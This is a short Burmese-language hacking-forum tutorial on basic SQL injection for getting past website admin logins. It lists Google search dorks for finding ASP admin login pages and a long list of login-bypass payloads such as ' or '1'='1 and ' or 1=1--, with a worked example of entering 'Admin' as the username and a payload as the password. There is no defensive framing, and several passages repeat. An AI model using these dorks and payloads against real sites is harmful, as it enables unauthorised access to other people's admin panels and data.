hacker 1989 ေရးတဲ့ Tutorial ေလးပါ။ေနာက္လဲသူ႕ဆီကရရင္ထပ္တင္ေပးပါ့မယ္။ကၽြန္ေတာ္ကသူ႕ေလာက္
မေရးတတ္လို႔ပါ.....ဟဲဟဲ....။mmhackforums.noonhost.com မွာလဲတင္ထားပါတယ္။
စမယ္.....
လြယ္ပါတယ္...ဒီ တစ္ဆင္႔ကေတာ႔ Easy ပါ...သိပ္မၾကာခင္မွာ part2 ဆက္ေရးေပးမယ္...
ဒါက basic sql injection အတြက္ အေကာင္းဆံုး dork ေတြပါ...
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
ထြက္လာတဲ႔ result ေတြထဲက ၾကိဳက္တာ click ေထာက္ပါ...
ADMIN USERNAME :
PASSWORD :
ဆိုျပီး ဒီလိုမ်ိဳးေတာင္းတာေလးေတြ ေတြ႔ရပါလိမ္႔မယ္...
Username ေနရာမွာ ထည္႔မွာကေတာ႔ အဲဗား Admin လို႔ပဲ ထည္႔ပါမယ္...password ေနရာမွာေတာ႔ ဒါေလးေတြထဲက ၾကိဳက္တာေလးကို ထည္႔ေနာ္...
ADMIN USERNAME :
PASSWORD :
ဆိုျပီး ဒီလိုမ်ိဳးေတာင္းတာေလးေတြ ေတြ႔ရပါလိမ္႔မယ္...
Username ေနရာမွာ ထည္႔မွာကေတာ႔ အဲဗား Admin လို႔ပဲ ထည္႔ပါမယ္...password ေနရာမွာေတာ႔ ဒါေလးေတြထဲက ၾကိဳက္တာေလးကို ထည္႔ေနာ္...
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
ဥပမာ -
username:Admin
password:'or'1'='1
ေပါ႔...
Enjoy!
username:Admin
password:'or'1'='1
ေပါ႔...
Enjoy!